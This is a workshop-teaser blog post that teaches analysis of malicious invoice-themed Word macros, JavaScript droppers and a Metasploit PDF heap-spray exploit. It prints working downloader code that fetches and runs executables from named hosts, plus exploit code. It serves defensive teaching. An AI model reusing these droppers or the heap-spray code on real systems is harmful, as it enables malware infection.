As we are giving another round of our Incident Analysis workshop at Troopers16, we wanted to give you a little taste of what you can expect.
Table of Contents
Extracting Mail Attachments
Word Document Analysis
Static JavaScript Analysis
Dynamic JavaScript Analysis
Before we dive into the analysis, I want to mention that if you are going to analyze anything unknown or potentially malicious, do it in a safe environment: a VM with no internet connection, ideally on a separate physical analysis device, or at least with all unnecessary functionality stripped from that VM (CVE-2015-3456 is an example that answers the “why”). Even things like looking at content with a text editor or extracting zip files should be done in the safe environment, as those tools could contain vulnerabilities.
Over the last few days, a flood of Word documents and zip files containing VBA/JavaScript code has been targeting multiple customers and end users (see for example this Heise article). If you ended up like me with 50+ mails containing potentially interesting malicious files and want to save them all, you could either save the attachments from all emails by hand or use a more automated approach (guess what we are going to do ; ) ):
Extracting Mail Attachments
Just select all emails, save them in a folder (as .eml), copy them to your VM, and download an EML parser such as this one: https://github.com/sim0nx/eml_parser
It is a library for EML file parsing and comes with an example script that fulfills our needs: it recursively extracts all attachments from all EML files in the current directory:
cd /opt
git clone https://github.com/sim0nx/eml_parser.git
cd eml_parser
python setup.py install
cd /path/to/eml-files
python /opt/eml_parser/examples/recursively_extract_attachments.py
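If installing a third-party parser inside the analysis VM is not an option, the same idea can be sketched with Python's standard library alone. This is only a minimal sketch and not the eml_parser script: the helper name extract_attachments and the output layout are assumptions made for illustration, and attached .eml messages are skipped rather than processed recursively.

```python
import email
import os
from email import policy


def extract_attachments(eml_bytes, out_dir):
    """Write every attachment of one raw .eml message to out_dir.

    Hypothetical helper for illustration; returns the written file names.
    """
    msg = email.message_from_bytes(eml_bytes, policy=policy.default)
    os.makedirs(out_dir, exist_ok=True)
    written = []
    for index, part in enumerate(msg.iter_attachments()):
        # Never trust the sender-supplied name: keep only the base name
        # and fall back to a generic one if it is missing.
        name = os.path.basename(part.get_filename() or "")
        if not name:
            name = "attachment_%d.bin" % index
        payload = part.get_payload(decode=True)
        if payload is None:
            continue  # multipart parts (e.g. attached messages) have no body of their own
        with open(os.path.join(out_dir, name), "wb") as handle:
            handle.write(payload)
        written.append(name)
    return written
```

Calling it once per file in the folder of saved .eml files gives roughly the same result as the example script for simple mails.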
In my case I now have a folder full of .doc, .zip and .eml files. Let’s start with the Word documents.
Word Document Analysis
Running file on those documents shows that they are not pre-2007 Word documents but use the newer format (XML in a zip container), despite the .doc extension:
$ file *
invoice_03734122_scan.doc: Microsoft Word 2007+
invoice_24708980_scan.doc: Microsoft Word 2007+
invoice_29445235_scan.doc: Microsoft Word 2007+
invoice_37795202_scan.doc: Microsoft Word 2007+
invoice_57373814_scan.doc: Microsoft Word 2007+
invoice_80698424_scan.doc: Microsoft Word 2007+
invoice_94222883_scan.doc: Microsoft Word 2007+
invoice_95159767_scan.doc: Microsoft Word 2007+
[...]
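Since “Microsoft Word 2007+” means the file is a zip container, the presence of a macro project can be checked without ever opening the document in Word. The following is a minimal sketch using Python's zipfile module; the helper name find_vba_parts is hypothetical, and matching on the member name vbaProject.bin is an assumption based on the usual Office naming, not a complete detection.

```python
import io
import zipfile


def find_vba_parts(doc_bytes):
    """Return the archive members that look like VBA projects (hypothetical helper)."""
    if not zipfile.is_zipfile(io.BytesIO(doc_bytes)):
        return []  # pre-2007 OLE2 documents are not zip archives
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as archive:
        # Only the member names are read; nothing is extracted to disk.
        return [name for name in archive.namelist()
                if name.lower().endswith("vbaproject.bin")]
```

An empty result does not mean the document is harmless; it only means this particular naming convention was not found.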
So you could now simply unzip the file and look at the content, or use tools for Word document analysis that also extract embedded objects. The interesting part of such a document might be nothing at all (it could be harmless), pictures, OLE objects, VBA script, … To analyze and extract those objects we can use e.g. viper (https://github.com/viper-framework/viper), a framework for file analysis that supports PE, PDF, Flash, Word documents, … :
python viper.py
viper >
viper > open -f invoice_03734122_scan.doc
viper invoice_03734122_scan.doc [not stored] > office -v
[*] Macro's Detected
[*] Stream Details
 - OLE Stream: VBA/ThisDocument
 - VBA Filename: ThisDocument.cls
[*] Stream Details
 - OLE Stream: VBA/trekdddjvjb
 - VBA Filename: trekdddjvjb.bas
[*] Stream Details
 - OLE Stream: VBA/oerdkaksnc
 - VBA Filename: oerdkaksnc.bas
[...]
[*] AutoRun Macros Found
+---------------+----------------------------------------+
| Method | Description |
+---------------+----------------------------------------+
| AutoOpen | Runs when the Word document is opened |
| Workbook_Open | Runs when the Excel Workbook is opened |
+---------------+----------------------------------------+
[*] Suspicious Keywords Found
+----------------+----------------------------------------------------------------------+
| KeyWord | Description |
+----------------+----------------------------------------------------------------------+
| Base64 Strings | Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all) |
| Environ | May read system environment variables |
| Chr | May attempt to obfuscate specific strings |
| StrReverse | May attempt to obfuscate specific strings |
| Base64 Strings | Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all) |
| CreateObject | May create an OLE object |
| SaveToFile | May create a text file |
| Open | May open a file |
| Shell | May run an executable file or a system command |
| Write | May write to a file (if combined with Open) |
| StrReverse | May attempt to obfuscate specific strings |
[...]
[*] Possible IOC's
+----------+----------------------+
| IOC | Type |
+----------+----------------------+
| rj48.exe | Executable file name |
+----------+----------------------+
[...]
This output already gives a good indication that this file might serve malicious purposes. But let’s have a closer look at the VBA code. OfficeMalScanner (http://www.reconstructer.org/code.html) is another tool for Office document analysis that also supports pre-2007 file formats (Didier Stevens’ oledump is also worth mentioning). Run once against the Word document, it extracts, among other content, a bin file called “vbaProject.bin”. As this file is not really human readable ; ) you can run the tool again on that bin file to get the decompressed VBA project:
C:\data> OfficeMalScanner.exe invoice_03734122_scan.doc inflate
+------------------------------------------+
|          OfficeMalScanner v0.61          |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+
[*] INFLATE mode selected
[*] Opening file invoice_03734122_scan.doc
[*] Filesize is 24680 (0x6068) Bytes
[*] Microsoft Office Open XML Format document detected.
Found 14 files in this archive
[Content_Types].xml ----- 1453 Bytes ----- at Offset 0x00000000
_rels/.rels ----- 590 Bytes ----- at Offset 0x000003c0
word/_rels/document.xml.rels ----- 939 Bytes ----- at Offset 0x000006e0
word/document.xml ----- 1980 Bytes ----- at Offset 0x00000938
word/vbaProject.bin ----- 40960 Bytes ----- at Offset 0x00000bcc
word/_rels/vbaProject.bin.rels ----- 277 Bytes ----- at Offset 0x000039dc
word/theme/theme1.xml ----- 6786 Bytes ----- at Offset 0x00003ad7
word/vbaData.xml ----- 1757 Bytes ----- at Offset 0x00004143
word/settings.xml ----- 4089 Bytes ----- at Offset 0x00004382
docProps/app.xml ----- 1004 Bytes ----- at Offset 0x000048e5
word/styles.xml ----- 27602 Bytes ----- at Offset 0x00004c0a
docProps/core.xml ----- 740 Bytes ----- at Offset 0x000056e3
word/fontTable.xml ----- 1261 Bytes ----- at Offset 0x0000598f
word/webSettings.xml ----- 514 Bytes ----- at Offset 0x00005b84
-----------------------------------------------------------------------------
Content was decompressed to C:\data\DecompressedMsOfficeDocument
Found at least 1 ".bin" file in the MSOffice document container.
Try to scan it manually with SCAN+BRUTE and INFO mode.
-----------------------------------------------------------------------------
C:\data> OfficeMalScanner.exe vbaProject.bin info
+------------------------------------------+
|          OfficeMalScanner v0.61          |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+
[*] INFO mode selected
[*] Opening file C:\data\vbaProject.bin
[*] Filesize is 40960 (0xa000) Bytes
[*] Ms Office OLE2 Compound Format document detected
-----------------------------------------
[Scanning for VB-code in VBAPROJECT.BIN]
-----------------------------------------
Class1
Class2
Class3
Class4
Class5
Class6
Class7
Class8
Class9
Class10
aIuhYqZk
jduyewiskd
oerdkaksnc
oGdyeJdhsdd
trekdddjvjb
ThisDocument
-----------------------------------------------------------------------------
VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
The decompressed Macro code was stored here:
------> C:\data\VBAPROJECT.BIN-Macros
-----------------------------------------------------------------------------
Looking at the VBA classes quickly reveals their purpose. Some excerpts follow:
$ cat jduyewiskd // serves the Microsoft.XMLHTTP object
[...]
Public Function IdjcTrsj()
IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
End Function
[...]
$ cat trekdddjvjb // serves the http download string
Attribute VB_Name = "trekdddjvjb"
Public Function oPlKtRebGf()
hyyuejkjs = "/h90"
yyeidsadf = "8/ckgig"
iuyhgdfsdf = oGdyeJdhsdd.TextBox1
yeuijjffsa = "rj48.exe"
oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
End Function
$ cat aIuhYqZk // sends the request and stores the response body to a local file
[…]
aIuhYqZk:Set xxxxxxxxxsssss = CreateObject(jduyewiskd.IdjcTrsj)
[…]
xxxxxxxxxsssss.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False
[…]
xxxxxxxxxsssss.send
[…]
$ cat oerdkaksnc // serves the local filename: shereder.exe
[…]
nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
[…]
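The string obfuscation in these excerpts is simple enough to undo by hand. As a minimal sketch (the helper names str_reverse and chr_concat are made up for illustration, and only the literals visible in the excerpts above are used), the two tricks can be replayed in Python:

```python
def str_reverse(text):
    """Python equivalent of VBA's StrReverse."""
    return text[::-1]


def chr_concat(codes):
    """Equivalent of Chr$(a) & Chr$(b) & ... for a list of character codes."""
    return "".join(chr(code) for code in codes)


print(str_reverse("PTTHLMX.tfosorciM"))   # object name passed to CreateObject
print(str_reverse("TSOP"))                # HTTP method passed to Open
print(chr_concat([47, 115, 104, 101, 114, 101, 100, 101, 114]))  # local path suffix
```

This prints Microsoft.XMLHTTP, POST and /shereder. The file extension is appended from oGdyeJdhsdd.TextBox3, whose value is not visible in the excerpt.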
We tried different tools on this VBA project, but they all seem to fail to reconstruct the VBA code completely. We can still reconstruct enough to get a fair understanding, especially when combined with the output of “strings”:
$ strings vbaProject.bin
[...]
cmd /c start %TMP%/shereder.exe
http://
cujamslud.com
[...]
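If the strings utility is not available in the analysis VM, a rough equivalent is only a few lines of Python. This is a sketch under the assumption that plain ASCII runs are good enough; the function name ascii_strings is hypothetical, and UTF-16 strings, which the real tool can also search for, are not covered.

```python
import re


def ascii_strings(data, min_len=4):
    """Return runs of at least min_len printable ASCII bytes, like a basic `strings`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.decode("ascii") for match in pattern.findall(data)]
```

Feeding it the bytes of vbaProject.bin and filtering for "http" or ".exe" is usually a quick way to spot candidates for indicators.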
It seems that this VBA script downloads a PE file (http://cujamslud.com/h908/ckgigrj48.exe) using an XMLHTTP request, drops it to the file system (%TMP%/shereder.exe) and most probably 😉 starts it (cmd /c start %TMP%/shereder.exe). At the time of writing the domain was no longer registered, so we searched the Internet and found some resources listing the same URL along with some IP information. Further analysis (for example of the PE file) is beyond the scope of this post, so let’s now have a quick look at the previously mentioned zip files containing JS files. The first steps of our analysis are pretty easy:
Static JavaScript Analysis
Make sure the content is as expected (e.g. no path traversal attempt like in this example ; ) ). You can list the file names and their paths e.g. with:
$ unzip -l SCAN_invoice_16683879.zip
Archive: SCAN_invoice_16683879.zip
Length Date Time Name
--------- ---------- ----- ----
7616 12-11-2015 00:19 invoice_SCAN_I1oNI.js
--------- -------
7616 1 file
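The same check can be automated when there are many archives to go through. The sketch below only reads the member names and flags those that are absolute or climb out of the extraction directory; the function name suspicious_members and the exact rules are assumptions for illustration, not a complete validation.

```python
import io
import posixpath
import zipfile


def suspicious_members(zip_bytes):
    """List member names that are absolute or climb out of the target directory."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            normalized = posixpath.normpath(name.replace("\\", "/"))
            if normalized.startswith("/") or normalized == ".." or normalized.startswith("../"):
                flagged.append(name)
            elif len(normalized) > 1 and normalized[1] == ":":
                flagged.append(name)  # Windows drive letter such as C:/...
    return flagged
```

An archive like the one listed above, with a single plain file name, yields an empty list.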
After verification and decompression, we have our JavaScript file.
At this point we could simply execute the JavaScript (in our “safe” environment, of course), either with a JavaScript engine or in a Windows VM, and analyze its behavior. But we first want to try to deobfuscate that gibberish before doing any dynamic analysis. There are many tools for this task, but in this case the online tool at http://wepawet.iseclab.org gave the best result.
It converted this:
var sHjQV=['','','','','','','','','','','\r','','','\n','','','','','','','','','','','','','','','','','','','
','!','"','#','$','%','&','\'','(',')','*','+',',','-
','.','/','0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G','H','I','J','K','L',
'M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','
l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','{','|','}','~','']
function IrxIt(WlsOnoPUwQL,RhsFEGiBvKyEi,oqagwARr){Jcfe=parseInt(WlsOnoPUwQL,RhsFEGiBvKyEi);pkZmZ=Jcfe.toString(oqagwARr);return pkZmZ;}function ccvXhbdUiOvitTb(tPKkbNkQJTmPAyLEp){eval(tPKkbNkQJTmPAyLEp)}
function VjFqTHurmqtPIXVHADFTKYagAASNPlLbBpJMzcyQznedGTSBBNFUdg(PbZTITbQguOvO,FRwgqMXymZllAn){ return sHjQV[IrxIt(PbZTITbQguOvO[FRwgqMXymZllAn],(16005+144)/769,(995+895)/189)];}
function luVNExc(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii) {return !isNaN(parseFloat(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii)) && isFinite(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii);}
function WoWVacmBoeP(PGFyXNIP,ylcvQp){return PGFyXNIP.split(ylcvQp)}
var k=new Array("d","a","d","a","5d","4d","59","1b","37","1b","2j","1b","1d","5a","56","4i","5b","28","5e","4h","4e","4h","5f","5b","59"
,"4d","50","55","24","4f","56","54","25","2e","2d","24","4h","5f","4h","30","1b","2a","2c","24","27","2b","27","24","2b","28",
"24","28","29","27","25","2e","2d","24","4h","5f","4h","30","1b","30","1b","30","1d","24","5a","57","53","50","5b","1j","1d","
[15 more lines]
var Z=new Array("2e","2a","2f","2h","d","a","4i","56","59","1b","1j","5d","4d","59","1b","52","2j","58","5g","32","2h","1b","52","2i",
"37","24","53","4h","55","4j","5b","4k","2h","1b","52","21","21","1k","1b","1b","5i","d","a","1b","1b","5d","4d","59","1b",
"36","58","1b","2j","1b","26","2h","d","a","1b","1b","5b","59","5g","1b","1b","5i","d","a","9","57","56","50","1b","2j","1b",
[20 more lines]
var YVAZk=[k,Z];
var RDNLwnEvG=[];
function MlhIzdPZPoDOwIMyz(YVAZk){sfGKPFjfYWJ= '';bMXXPRpAhUk=(-678+678)/697; while(true){if(bMXXPRpAhUk >= (350+478)/414)break;RDNLwnEvG[bMXXPRpAhUk]=(-448+448)/856; while(true) { if(RDNLwnEvG[bMXXPRpAhUk] > YVAZk[bMXXPRpAhUk].length-(-35+140)/105) { break; } if (luVNExc(IrxIt(YVAZk[bMXXPRpAhUk][RDNLwnEvG[bMXXPRpAhUk]],(16471+728)/819,(9471+19)/949))) {sfGKPFjfYWJ += VjFqTHurmqtPIXVHADFTKYagAASNPlLbBpJMzcyQznedGTSBBNFUdg([YVAZk[bMXXPRpAhUk][RDNLwnEvG[bMXXPRpAhUk]]], (-467+467)/398);} RDNLwnEvG[bMXXPRpAhUk]++;}bMXXPRpAhUk++;} return sfGKPFjfYWJ}
ccvXhbdUiOvitTb(MlhIzdPZPoDOwIMyz(YVAZk));
To this:
var F = "soft2webextrain.com/87.exe? 46.151.52.231/87.exe? ? ?".split(" ");
var nzT = ((1/*dRtI52245596n513333uM354193eOiZ*/) ? "WScri" : "") + "pt.Shell";
var Nn = WScript.CreateObject(nzT);
var Zb = "%TEMP%\\";
var dwM = Nn.ExpandEnvironmentStrings(Zb);
var xwS = "2.XMLH";
var XDm = xwS + "TTP";
var Es = true, rUjG = "ADOD";
var cT = WScript.CreateObject("MS" + "XML" + (34461, XDm));
var zRr = WScript.CreateObject(rUjG + "B.St" + (399562, "ream"));
var qyA = 0;
var i = 1;
var hoaOWrt = 91849;
for (var k = qyA; k < F.length; k ++ ){
    var Eq = 0;
    try {
        poi = "GET";
        cT.open(poi, "http://" + F[k] + i, false);
        cT.send();
        if (cT.status == 666 - 466){
            zRr.open();
            zRr.type = 1;
            zRr.write(cT.responseBody);
            if (zRr.size > 19446 - 340){
                Eq = 1;
                zRr.position = 0;
                zRr.saveToFile/*uZMX34V9eG*/(dwM/*b9oA23mO8o*/ + hoaOWrt + ".exe", 4 - 2);
                try {
                    if (((new Date()) > 0, 7668985888)){
                        Nn./*d652458uTuQ*/Run(dwM + hoaOWrt +/* 7kC453EHUY */ ".exe" ,/* YlmN21RbgX */ 3 - 2, 0);
                        break ;
                    }
                }
                catch (HJ){
                }
                ;
            }
            ;
            zRr.close();
        }
        ;
        if (Eq == 1){
            qyA = k;
            break ;
        }
        ;
    }
    catch (HJ){
    }
    ;
}
;
Pretty neat.
This script seems to do pretty much the same as the VBA script earlier: it downloads a PE file (http://soft2webextrain.com/87.exe?1) via an XMLHTTP request (MSXML2.XMLHTTP), stores it on the file system (%TEMP%\91849.exe) and executes it. If that download does not succeed, it moves on to the next entry in its list (46.151.52.231/87.exe?). That was really easy thanks to deobfuscation.
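For the curious, the encoding in the obfuscated sample can also be undone by hand. The helper IrxIt is parseInt(value, base).toString(base2), and the two constant expressions work out to (16005+144)/769 = 21 and (995+895)/189 = 10, so every array entry is a character code written in base 21. The sketch below replays that in Python; it assumes that the lookup table sHjQV is simply an ASCII table indexed by character code (so chr() stands in for it), and the name decode_tokens is made up for illustration.

```python
def decode_tokens(tokens, base=21):
    """Decode base-`base` character codes into text, skipping non-numeric tokens."""
    chars = []
    for token in tokens:
        try:
            chars.append(chr(int(token, base)))
        except ValueError:
            continue  # plays the role of the script's isNaN/isFinite guard
    return "".join(chars)


# First printable tokens of the array k from the obfuscated sample.
sample = ["5d", "4d", "59", "1b", "37", "1b", "2j", "1b", "1d",
          "5a", "56", "4i", "5b", "28", "5e", "4h", "4e"]
print(decode_tokens(sample))
```

The sample tokens decode to the beginning of the deobfuscated script, var F = "soft2web, which matches the tool output. The decoded text is what the sample finally hands to eval.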
So one of the next analysis steps would be a download of this “87.exe” file and further analysis, but this is again beyond the scope of this post and will be covered in our workshop.
Dynamic JavaScript Analysis
In a case where deobfuscation doesn’t work, the following steps represent a dynamic approach to analyze unknown JS. In this example we use the JavaScript extracted from a PDF, generated with Metasploit for the vulnerability CVE-2009-3953.
From within our VM, we can use one of these tools to execute the JavaScript in a controlled way (as long as you follow some precautions):
- Spidermonkey (Mozilla’s JavaScript engine written in C/C++)
- SlimerJS (built on top of Gecko and SpiderMonkey – like Firefox)
- PhantomJS (built on top of WebKit and JavaScriptCore – like Safari )
The main difference between those is that Spidermonkey supports only JS and no HTML and so on. One important point: If you are aware which JavaScript Engine the malicious code is attacking, you might wanna use one of the others ; )
Starting Spidermonkey is as simple as typing ‘js’ from a shell:
js
js>
Before starting to paste unknown JavaScript, you should be aware that everything you paste is executed by the JavaScript engine and might already exploit a vulnerability. So to prevent this, a first simple rule is to overwrite dangerous functions like “eval” via this command:
eval = print
From now on, everything given to eval will not be evaluated but only printed.
The next piece of advice is to paste only one command at a time so you can investigate what is happening. But enough of all that safety stuff, let’s see what we get. The function of interest (it is one of only two relevant functions) looks like this:
function g(FAKMoQN) {
    var ZlxHFeJtb = 1000;
    var kHrJoBEVotHFwefWoEVZSENEVJE = new Array(ZlxHFeJtb);
    var mcBnbQteW = unescape("%u0000%u0000%u0000%u0001%u1020%u0901%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");
    var oeGHnIredEOzjuO = unescape("%u5858");
    while (oeGHnIredEOzjuO.length <= FAKMoQN/2 - mcBnbQteW.length) oeGHnIredEOzjuO += oeGHnIredEOzjuO;
    for (enySsPTVlkEkBtVEtNviOwoLn=0; enySsPTVlkEkBtVEtNviOwoLn < ZlxHFeJtb; enySsPTVlkEkBtVEtNviOwoLn+=1) {
        QoFafVURIRIyZQRxgYQpKmHVkjIunzUv = ""+enySsPTVlkEkBtVEtNviOwoLn;
        kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=mcBnbQteW + oeGHnIredEOzjuO.substring(0,FAKMoQN/2-mcBnbQteW.length);
    }
    for (abhKMyoXpvnvMnBFhGzhu=0;abhKMyoXpvnvMnBFhGzhu<100;abhKMyoXpvnvMnBFhGzhu++) {
        for (enySsPTVlkEkBtVEtNviOwoLn=ZlxHFeJtb/2; enySsPTVlkEkBtVEtNviOwoLn < ZlxHFeJtb-2; enySsPTVlkEkBtVEtNviOwoLn+=2) {
            kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=null;
            kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=oeGHnIredEOzjuO.substring(0,0x10000/2 )+"A";
            kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=null;
        }
    }
    return kHrJoBEVotHFwefWoEVZSENEVJE;
}
This function is called later on like this:
var mcBnbQteWs = g(6500);
If you simply paste the complete code (the original exploit code contains one additional function) and try to print all the generated variables, you are in luck if the print ever returns and doesn’t kill SpiderMonkey. So for this part, it might be a better idea to pass 1 instead of 6500 to the “g” function:
js> g(1)
["\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0"
[...]
The fact that the two functions used (the second one has been stripped from this post) generate really LARGE arrays is a good indication that this script tries to exploit a vulnerability using heap spraying. Looking at the Metasploit module, we even get developer notes on this exploit:
Original notes on heap technique used in this exploit:
## PREPAREHOLES:
## We will construct 6500*20 bytes long chunks starting like this
## |0 |6 |8 |C |24 |size
## |00000... |0100|20100190|0000... | ......pad...... |
## \ \
## \ \ -Pointer: to controlled data
## \ -Flag: must be 1
[...]
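To relate the function g to such a layout, it helps to look at the bytes that the unescape() strings occupy in memory. The following sketch converts the %uXXXX sequences into little-endian bytes and estimates the size of the initial fill. It assumes two bytes per character, and the helper name unescape_to_bytes is made up for illustration.

```python
import re
import struct


def unescape_to_bytes(text):
    """Turn %uXXXX sequences into the little-endian bytes they occupy in memory."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", text)
    return b"".join(struct.pack("<H", int(unit, 16)) for unit in units)


# Header string from g(): six leading units followed by twelve %u0000 units.
header = unescape_to_bytes(
    "%u0000%u0000%u0000%u0001%u1020%u0901" + "%u0000" * 12)
print(header.hex())
print(len(header))                                   # header size in bytes
print(hex(int.from_bytes(header[8:12], "little")))   # 4-byte value at offset 8

# Size estimate for the first loop of g(6500), assuming 2 bytes per character:
# each of the 1000 array slots holds FAKMoQN/2 characters, i.e. about FAKMoQN bytes.
print(6500 // 2 * 2 * 1000)
```

The header comes out at 36 (0x24) bytes with the bytes 01 00 at offset 6, which fits the offsets and the “Flag: must be 1” remark in the notes, and the first loop of g(6500) fills roughly 6.5 MB. The second loop then repeatedly clears every other slot in the upper half of the array, which appears to be what the PREPAREHOLES note refers to.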
As we normally don’t have exploit developer notes for zero-day stuff ;-), the next step is usually a dynamic analysis to see what the code is doing. An easy way to do this is to use Cuckoo, but this is also beyond the scope of this little post and will be covered in our workshop.
We hope you enjoyed this post and look forward to seeing you at Troopers16.